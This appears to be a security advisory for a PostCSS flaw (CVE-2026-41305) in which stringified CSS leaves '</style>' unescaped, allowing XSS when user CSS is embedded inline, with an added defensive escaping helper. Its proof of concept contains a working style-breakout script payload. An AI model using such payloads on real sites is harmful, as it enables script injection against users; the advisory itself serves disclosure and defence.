GHSA-qx2v-qp2m-jg93

Source
https://github.com/advisories/GHSA-qx2v-qp2m-jg93
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-qx2v-qp2m-jg93/GHSA-qx2v-qp2m-jg93.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qx2v-qp2m-jg93
Aliases
  • CVE-2026-41305
Downstream
Related
Published
2026-04-24T15:31:42Z
Modified
2026-05-06T17:44:15.783349140Z
Severity
  • 6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
Summary
PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
Details

PostCSS: XSS via Unescaped </style> in CSS Stringify Output

Summary

PostCSS v8.5.5 (latest) does not escape </style> sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML <style> tags, </style> in CSS values breaks out of the style context, enabling XSS.

Proof of Concept

const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes

Tested output (Node.js v22, postcss v8.5.5):

Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true

Impact

Affects non-bundler use cases, for example code that stringifies user-submitted CSS and embeds the result in a page; bundler-based pipelines are not exposed to this XSS on their own. Exploitation in such a pipeline would require a malicious PostCSS plugin, which could inject the XSS into the website.

Suggested Fix

Escape </style in all stringified output values:

output = output.replace(/<\/(style)/gi, '<\\/$1');
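The following is an added example (not PostCSS's own code and not part of the advisory) that turns the one-line suggested fix into a small embedding helper: it escapes every case variant of the </style sequence, verifies that the escaped output can no longer end a <style> element, and refuses to embed if it still can. The function names, the helper structure and the sample CSS are assumptions made for this illustration.

```javascript
// Added example, not PostCSS code: defensive handling of "</style" in
// stringified CSS before it is embedded inline in an HTML <style> element.

// The HTML tokenizer ends a <style> element's raw-text content on the
// sequence "</style" in any letter case, whether or not it sits inside a
// CSS string literal. Match it case-insensitively and globally.
const STYLE_CLOSE = /<\/(style)/gi;

// Rewrite "</style" as "<\/style" (the advisory's suggested fix). Inside a
// CSS string literal the backslash is a CSS escape, so "<\/style" still
// means "</style" to the CSS engine, while the HTML parser never sees the
// raw "</style" sequence. Outside a string literal the sequence was never
// valid CSS, so nothing legitimate is lost.
function escapeStyleClose(css) {
  return css.replace(STYLE_CLOSE, '<\\/$1');
}

// Check: does a CSS blob still contain a sequence that would end the
// enclosing <style> element? Useful as a final guard or as a log/alert
// condition on the server side.
function containsStyleClose(css) {
  return /<\/style/i.test(css);
}

// Embed CSS into a page only after escaping; throw rather than emit markup
// that could break out of the style context.
function embedInStyleTag(css) {
  const safe = escapeStyleClose(css);
  if (containsStyleClose(safe)) {
    throw new Error('refusing to embed CSS that can close the <style> element');
  }
  return `<style>${safe}</style>`;
}

// Constructed sample (hypothetical, not taken from any real site): the kind
// of re-stringified CSS the advisory describes, with the breakout sequence
// inside a string value, in mixed case to exercise the case-insensitive match.
const sampleCss = 'body { content: "</STYLE><b>x</b><style>"; }';

// Usage:
//   containsStyleClose(sampleCss)  -> true
//   escapeStyleClose(sampleCss)    -> 'body { content: "<\/STYLE><b>x</b><style>"; }'
//   embedInStyleTag(sampleCss)     -> '<style>body { content: "<\/STYLE><b>x</b><style>"; }</style>'
```

The escape only neutralises the raw-text breakout; it is the minimal fix at the stringify boundary. Where the CSS is untrusted, a stronger control is to avoid inline embedding altogether and serve the stylesheet from its own URL with a text/css content type, where no HTML raw-text element boundary exists for the content to escape.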

Credits

Discovered and reported by Sunil Kumar (@TharVid)

Database specific
{
    "cwe_ids": [
        "CWE-79"
    ],
    "nvd_published_at": "2026-04-24T03:16:11Z",
    "severity": "MODERATE",
    "github_reviewed_at": "2026-04-24T15:31:42Z",
    "github_reviewed": true
}
References

Affected packages

npm / postcss

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
8.5.10

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-qx2v-qp2m-jg93/GHSA-qx2v-qp2m-jg93.json"